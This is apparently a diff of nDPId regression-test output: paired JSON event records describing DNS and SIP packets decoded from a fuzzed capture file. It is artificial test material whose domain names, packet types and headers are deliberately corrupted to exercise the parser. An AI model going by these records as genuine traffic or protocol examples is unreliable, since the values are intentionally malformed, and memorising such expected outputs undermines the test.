00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470431657,"flow_last_seen":1120470431657,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470431657,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.5.2","src_port":53,"dst_port":2784,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.aspa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
00414{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":411,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":18688,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470431658,"pkt":"ADBUADRWAODtAW69SQBFAIBIa1EAAIARTADAqAECwKgBAQrhADUANAD+KOYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":411,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":18688,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470431658,"pkt":"ADBUADRWAODtAW69SQBFAIBIa1EAAIARTADAqAECwKgBAQrhADUANAD+KOYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":411,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":18688,"global_ts_msec":1120470439142} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":411,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":18688,"global_ts_msec":1120470439142}
00413{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":412,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470431658,"pkt":"ADBUADRWAODtAW69CABFAABIa1LfAEwlcwDAqAECwKgBAQrhADUANAD+KOYBAAABAAAAQAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":412,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470431658,"pkt":"ADBUADRWAODtAW69CABFAABIa1LfAEwlcwDAqAECwKgBAQrhADUANAD+KOYBAAABAAAAQAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":412,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470440137} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":412,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470440137}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470259918,"flow_last_seen":1120470259918,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470431658,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":14798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470259918,"flow_last_seen":1120470259918,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470431658,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":14798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470250807,"flow_last_seen":1120470250807,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470431658,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2765,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470250807,"flow_last_seen":1120470250807,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470431658,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2765,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250805,"flow_last_seen":1120470250805,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470431658,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":413,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470250805,"flow_last_seen":1120470250805,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470431658,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -785,8 +785,8 @@
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456151,"flow_last_seen":1120470456151,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470456151,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.3","src_port":2786,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456151,"flow_last_seen":1120470456151,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470456151,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.3","src_port":2786,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1120470456151,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470456151,"pkt":"ADBUADRWAODtAW69CABFAABEa1kAAIARS\/zAqAECwKgBAwriADUAMED14+cAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZKxyBGFycGEAAAwAAQ=="} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1120470456151,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470456151,"pkt":"ADBUADRWAODtAW69CABFAABEa1kAAIARS\/zAqAECwKgBAwriADUAMED14+cAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZKxyBGFycGEAAAwAAQ=="}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456151,"flow_last_seen":1120470456151,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470456151,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.3","src_port":2786,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-ad?r.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456151,"flow_last_seen":1120470456151,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470456151,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.3","src_port":2786,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-ad?r.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00439{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":420,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"thread_ts_msec":1120470456151,"pkt":"AODtAW69ADBUADRWCABFAABbAABACEARtz7AqAEBwKgBAgA1CuIARyNx4+eAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00425{"packet_event_id":1,"packet_event_name":"packet","packet_id":420,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"thread_ts_msec":1120470456151,"pkt":"AODtAW69ADBUADRWCABFAABbAABACEARtz7AqAEBwKgBAgA1CuIARyNx4+eAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":420,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71,"global_ts_msec":1120470456152} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":420,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71,"global_ts_msec":1120470456152}
00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456286,"flow_last_seen":1120470456286,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1120470456286,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":9587,"dst_port":196,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456286,"flow_last_seen":1120470456286,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1120470456286,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":9587,"dst_port":196,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
01099{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1120470456286,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":527,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":527,"pkt_l4_len":493,"thread_ts_msec":1120470456286,"pkt":"AODtAW69ADBUADRWCABFAAIBAABAADcRiizU8iEjwKgBAiVzAMQB7c3hU0lQJXMAMCA0MDEgVW5hdXRob3JpemVkDQpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDU2VxOiA3NiBSRUdJU1RFUg0KRnJvbTogPHNpcDp2b2kxODA2MkBzaXAuY3liZXJjaXR5LmRrPjN0YWc9M2JmZmNjYw0KVG86IDxzaXA6dm9pMTgwNjJAc2lwLmN5+GVyY2l0cS5kaz47dGFnPTAwLTA0MDkwLTE3MDFiNjUxLTE1YzIzOGNlNg0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjtyZUNlaXNlZD04MC4yMzAuMjE5LjcwO3Jwb3J0PTUwNjA7YnJhbmNoPXo5aEc0YktucDYyOTEzNjY1LTQzMGFhMmRhMTkyLjE2OC4xLjINCldXVy0lcwBoZW50aWNhtWU6IERpZ2VzdFNyZWFsbT0ic2lwLmN5YmVyYyVzAEFkayIsbm9uY2VUIjE3MDFiNjM5MTQ4MDVjZDIxMzk1MzZjMDAzMjNkNTgiLG9wYXF1ZT0iMTcwMWExMzUxYjcwNzk1IixzdGFsZT1mYWxzZSxhbGdvcml0aCVzAEQ1DQpDb250ZW50LUxlbmd0aDogMA0KDQo="} 01099{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1120470456286,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":527,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":527,"pkt_l4_len":493,"thread_ts_msec":1120470456286,"pkt":"AODtAW69ADBUADRWCABFAAIBAABAADcRiizU8iEjwKgBAiVzAMQB7c3hU0lQJXMAMCA0MDEgVW5hdXRob3JpemVkDQpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDU2VxOiA3NiBSRUdJU1RFUg0KRnJvbTogPHNpcDp2b2kxODA2MkBzaXAuY3liZXJjaXR5LmRrPjN0YWc9M2JmZmNjYw0KVG86IDxzaXA6dm9pMTgwNjJAc2lwLmN5+GVyY2l0cS5kaz47dGFnPTAwLTA0MDkwLTE3MDFiNjUxLTE1YzIzOGNlNg0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjtyZUNlaXNlZD04MC4yMzAuMjE5LjcwO3Jwb3J0PTUwNjA7YnJhbmNoPXo5aEc0YktucDYyOTEzNjY1LTQzMGFhMmRhMTkyLjE2OC4xLjINCldXVy0lcwBoZW50aWNhtWU6IERpZ2VzdFNyZWFsbT0ic2lwLmN5YmVyYyVzAEFkayIsbm9uY2VUIjE3MDFiNjM5MTQ4MDVjZDIxMzk1MzZjMDAzMjNkNTgiLG9wYXF1ZT0iMTcwMWExMzUxYjcwNzk1IixzdGFsZT1mYWxzZSxhbGdvcml0aCVzAEQ1DQpDb250ZW50LUxlbmd0aDogMA0KDQo="}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456513,"flow_last_seen":1120470456513,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470456513,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.3.1","src_port":2787,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470456513,"flow_last_seen":1120470456513,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470456513,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.3.1","src_port":2787,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -809,12 +809,12 @@
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470473526,"flow_last_seen":1120470473526,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470473526,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2788,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470473526,"flow_last_seen":1120470473526,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470473526,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2788,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1120470473526,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470473526,"pkt":"ADBUADRWAODtAW69CABFAABEa2AAAIARS\/XAqAECwKgBAQrkADUAMLnxaukAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1120470473526,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470473526,"pkt":"ADBUADRWAODtAW69CABFAABEa2AAAIARS\/XAqAECwKgBAQrkADUAMLnxaukAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470473526,"flow_last_seen":1120470473526,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470473526,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2788,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470473526,"flow_last_seen":1120470473526,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470473526,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2788,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00439{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":429,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"thread_ts_msec":1120470473526,"pkt":"AODtAW69ADBUADRWCABFAABbAABAJXMAtz7AqAEBwKgBAgA1CuQAR5xtaumAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3Qw"} 00425{"packet_event_id":1,"packet_event_name":"packet","packet_id":429,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"thread_ts_msec":1120470473526,"pkt":"AODtAW69ADBUADRWCABFAABbAABAJXMAtz7AqAEBwKgBAgA1CuQAR5xtaumAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3Qw"}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":429,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71,"global_ts_msec":1120470473527} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":429,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71,"global_ts_msec":1120470473527}
00414{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":431,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2157,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470473529,"pkt":"ADBUADRWACVzVG69CG1FAABIa2IAAIARS+\/AqAECwKgBAQrlADUANLH1d+oBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":431,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2157,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470473529,"pkt":"ADBUADRWACVzVG69CG1FAABIa2IAAIARS+\/AqAECwKgBAQrlADUANLH1d+oBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":431,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2157,"global_ts_msec":1120470473631} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":431,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2157,"global_ts_msec":1120470473631}
01011{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":432,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":532,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":532,"pkt_l4_len":0,"thread_ts_msec":1120470473529,"pkt":"AODtCW69ADBUADRWCABFACVzAABAADcRiifU8iEjwKgBAhPEE8QB8jJ0U0lQLzIuMCA0MDEgbm9uY2UgaGFzIGNoYW5nZWQNCkNhbGwtSUQ6IDU3ODIyMjcyOS00NjY1ZDc3NUA1NzgyMjI3MzItNDY2NWQ3NzINCkNTZXE6IDc3IFJFR0lTVEVSDQpGcm9tOiA8c2lwOnZvaTE4MDYyQHNpcC5jeWJlcmNpdHkuZGs+O3RhZz0zYTU4MTQxDQpUbzogPHNpcDp2b2kxODA2MkBzaXAuY3liZXJjaXR5LmRrPjt0YWc9MDAtMDQwODktMTcwMWI2ODMtMThlYzGqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 